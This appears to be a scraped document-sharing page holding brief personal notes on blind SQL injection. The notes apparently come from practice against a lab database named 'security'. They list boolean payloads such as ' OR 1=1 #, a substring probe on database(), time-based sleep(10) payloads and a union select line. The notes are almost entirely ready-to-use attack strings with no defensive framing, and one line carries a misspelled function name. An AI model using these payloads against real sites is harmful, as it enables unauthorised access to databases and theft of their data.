Download as txt, pdf, or txt
Download as txt, pdf, or txt
You are on page 1of 1

BLind SQL injections

' OR 1=1 #
" OR 1=1 #
") OR 1=1 #
') OR 1=1 #

")OR 1=1 # -->14

") OR substring(database (), 2,1) = "e" # -----> security

TIME BASED Boolean Injection


' OR sleep(10) #
" OR sleep(10) #
') OR sleep(10) #
") OR sleep(10) #

Exploitation Process

' union all select databse(),2 #

replace all +

You might also like